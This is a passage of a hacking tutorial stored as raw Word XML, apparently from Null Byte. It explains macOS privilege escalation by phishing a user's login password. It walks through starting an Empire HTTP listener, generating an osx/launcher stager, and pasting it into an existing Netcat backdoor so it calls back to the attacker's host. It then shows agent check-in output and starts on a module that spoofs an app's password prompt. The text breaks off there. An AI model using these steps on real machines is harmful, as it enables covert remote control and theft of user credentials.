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9A" w:rsidRPr="0098489A" w:rsidRDefault="0098489A" w:rsidP="00393FBD">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98489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>How to Perform Privilege Escalation, Part 2 (Password Phishing)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="0098489A" w:rsidRPr="0098489A" w:rsidRDefault="00393FBD" w:rsidP="0098489A">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color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://null-byte.wonderhowto.com/how-to/hacking-macos-perform-privilege-escalation-part-1-file-permissions-abuse-0186331" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0098489A" w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Locating and abusing files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0098489A" w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing unsafe permissions is an easy and surefire way to elevate shell privileges on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0098489A" w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>backdoored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0098489A" w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0098489A" w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0098489A" w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> device. This time around, we'll be more aggressive and attempt to phish a user's login password by prompting a convincing popup message merely asking the target for their password.</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This privilege escalation method consists of the attacker invoking a prompt that instructs the target users to enter their password into a convincing popup window. The </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Empire</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>prompt</w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> module allows us to spoof which application is requesting the user's login password. So, we can make iTunes, the App Store, or any installed App request a password input for a believable </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>social engineering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098489A" w:rsidRPr="0098489A" w:rsidRDefault="0098489A" w:rsidP="0098489A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Previously: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Perform Privilege Escalation by Abusing File Permissions in </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>MacOS</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>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As we can see using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>whoami</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">established </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Netcat</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve"> backdoor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not root, but instead a regular user (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tokyoneon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w: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bash-3.2</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whoami</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98489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tokyoneon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>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first thing we want to do is convert our primitive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor to a </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>fully featured Empire backdoor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. This article assumes readers have some experience with Empire. Beginners should reference Null Byte's "</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Getting Started</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" and "</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Generating Stagers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" guides before proceeding.</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1 Start an Empire Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098489A" w:rsidRPr="0098489A" w:rsidRDefault="00393FBD" w:rsidP="0098489A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:anchor="jump-step1" w:history="1">
        <w:r w:rsidR="0098489A" w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Start Empire</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0098489A" w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a listener waiting for incoming connections from the target MacBook. In this example, I'm using an HTTP listener on port 8080. The below commands can be used to quickly set up an Empire listener.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&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>listeners</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No listeners currently active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listeners) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uselistener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http</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listeners/http) &gt; set Port 8080</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listeners/http) &gt; set Host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xx.xx.xx.xx</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listeners/http) &gt; execute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lastRenderedPageBreak/>
        <w:t>[*] Starting listener 'http'</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Serving Flask app "http" (lazy loading)</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Environment: production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WARNING: do not use the development server in a production environment.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Use a production WSGI server instead.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Debug mode: off</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Listener successfully started!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listeners/http) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>listeners</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Active listeners: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Name        Module      Host                        Delay/Jitter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      ----                        -----------</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gramStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http</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http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        http://xx.xx.xx.xx:8080      5/0.0</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listeners) &gt; _</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"Host" address can be your local network IP address or </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>VPS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> address for remote attacks.</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2 Generate an OSX Stager</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Next, create a launcher script using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>osx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/launcher </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:anchor="jump-step4" w:history="1">
        <w:r w:rsidRPr="0098489A">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>stager</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. This can be done using the below commands.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98489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usestager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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/launcher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set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Listener http</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generate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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entire launcher output should be copied and pasted into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal. Including the "echo" and "python" portions at the beginning and ends of the output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098489A" w:rsidRPr="0098489A" w:rsidRDefault="0098489A" w:rsidP="0098489A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5303520" cy="3675888"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="5" name="Picture 5" descr="https://img.wonderhowto.com/img/01/72/63662339329288/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1/72/63662339329288/0/hacking-macos-perform-privilege-escalation-part-2-password-phishing.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3675888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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A new agent will appear in the Empire terminal allowing us to further exploit the MacBook.</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agents) &gt; [*] Sending PYTHON stager (stage 1) to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xx.xx.xx.xx</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Agent P98MAEE0 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xx.xx.xx.xx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> posted valid Python PUB key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New agent P98MAEE0 checked in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Initial agent P98MAEE0 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xx.xx.xx.xx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> now active (Slack)</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Sending agent (stage 2) to P98MAEE0 at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xx.xx.xx.xx</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[&gt;] ...................</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agents) &gt; _</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3 Select Your Target &amp; Module</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Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>interact</w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to begin issuing commands to the compromised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stager/</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/launcher) &gt; interact P98MAEE0</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P98MAEE0) &gt;</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Enable the </w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>collection/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>osx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098489A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/prompt</w:t>
      </w:r>
      <w:r w:rsidRPr="0098489A">
